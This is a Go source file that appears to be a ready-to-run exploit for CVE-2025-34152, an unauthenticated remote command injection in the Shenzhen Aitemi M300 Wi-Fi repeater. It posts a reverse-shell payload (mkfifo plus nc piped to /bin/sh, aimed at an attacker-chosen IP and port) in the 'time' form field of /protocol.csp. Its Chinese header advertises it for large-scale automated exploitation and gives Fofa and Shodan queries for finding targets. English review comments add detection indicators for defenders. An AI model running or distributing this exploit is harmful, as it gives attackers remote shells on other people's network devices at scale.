package main
import (
"flag"
"fmt"
"io"
"net/http"
"net/url"
"os"
"strings"
)
/*
深圳爱特米M300 Wi-Fi中继器未授权RCE (CVE-2025-34152)
- 不需要身份验证(即使登录面板已启用)
- 不会重启设备
- 不影响网络配置
- 适合大规模自动化利用
搜索语法:
- Fofa: icon_hash="-741058468" && server="lighttpd/1.4.32"
- Shodan: http.favicon.hash:-741058468 lighttpd/1.4.32
*/
// main builds and sends one HTTP POST to <host>/protocol.csp? whose "time"
// form field carries a shell command substitution, then prints the response
// status code and body. The file's header comment attributes this request
// pattern to CVE-2025-34152 and describes it as unauthenticated.
//
// Flags: -u is the target base URL, -i and -p are the address and port that
// get interpolated into the command string, -x is an optional HTTP proxy.
// -u, -i and -p are required; if any is empty the usage line is printed and
// the process exits with status 1.
//
// NOTE(review), for defenders: the stable features of this request are the
// path /protocol.csp, the body prefix
// fname=system&opt=time_conf&function=set, and a "time" value that begins
// with the percent-encoded form of "$(". A time setting presumably never
// needs shell metacharacters, so a rule on the device's management interface
// (reverse proxy, IDS, or log review) can key on those three together.
// Confirm against real traffic before deploying. Patch availability is not
// stated in this file, so keep the management interface off untrusted
// networks.
func main() {
host := flag.String("u", "", "目标主机URL(例如:http://192.168.11.1)")
lhost := flag.String("i", "", "反向shell的攻击者IP")
lport := flag.String("p", "", "反向shell的攻击者端口")
proxyURL := flag.String("x", "", "可选代理URL(例如:http://127.0.0.1:8080)")
flag.Parse()
// All three of -u, -i and -p must be supplied; -x stays optional.
if *host == "" || *lhost == "" || *lport == "" {
fmt.Printf("用法:%s -u <主机URL> -i <本地主机> -p <本地端口> [-x <代理URL>]\n", os.Args[0])
os.Exit(1)
}
// Drop trailing slashes so the appended path does not start with "//".
h := strings.TrimRight(*host, "/")
endpoint := h + "/protocol.csp?"
// The value is wrapped in $( ... ), so it is only meaningful if the receiving
// side hands the "time" field to a shell. That handling is not visible here
// and is presumably the flaw the header comment refers to.
// -i and -p are inserted as given, with no validation.
raw := fmt.Sprintf("$(mkfifo /tmp/x; nc %s %s < /tmp/x | /bin/sh > /tmp/x 2>&1)", *lhost, *lport)
// QueryEscape encodes a space as "+"; the next line rewrites those to "%20".
// NOTE(review): presumably the device's form parser does not decode "+".
// Not confirmed by this file.
encoded := url.QueryEscape(raw)
encoded = strings.ReplaceAll(encoded, "+", "%20")
body := fmt.Sprintf("fname=system&opt=time_conf&function=set&time=%s", encoded)
// No header is set on the request, so it leaves with net/http defaults (no
// Content-Type; User-Agent normally "Go-http-client/1.1"). NOTE(review):
// useful as a secondary log indicator only, since it is trivially changed.
req, err := http.NewRequest("POST", endpoint, strings.NewReader(body))
if err != nil {
fmt.Printf("[!] 请求创建失败:%v\n", err)
os.Exit(1)
}
// Route the request through the proxy given with -x, if any.
transport := &http.Transport{}
if *proxyURL != "" {
parsedURL, err := url.Parse(*proxyURL)
if err != nil {
fmt.Printf("[!] 无效的代理URL:%v\n", err)
os.Exit(1)
}
transport.Proxy = http.ProxyURL(parsedURL)
}
client := &http.Client{Transport: transport}
resp, err := client.Do(req)
if err != nil {
fmt.Printf("[!] 请求失败:%v\n", err)
os.Exit(1)
}
defer resp.Body.Close()
// The status code and raw body are printed as received; nothing here checks
// whether the injected command actually ran on the device.
fmt.Printf("[+] 响应 %d\n", resp.StatusCode)
data, err := io.ReadAll(resp.Body)
if err != nil {
fmt.Printf("[!] 读取响应失败:%v\n", err)
os.Exit(1)
}
fmt.Println(string(data))
}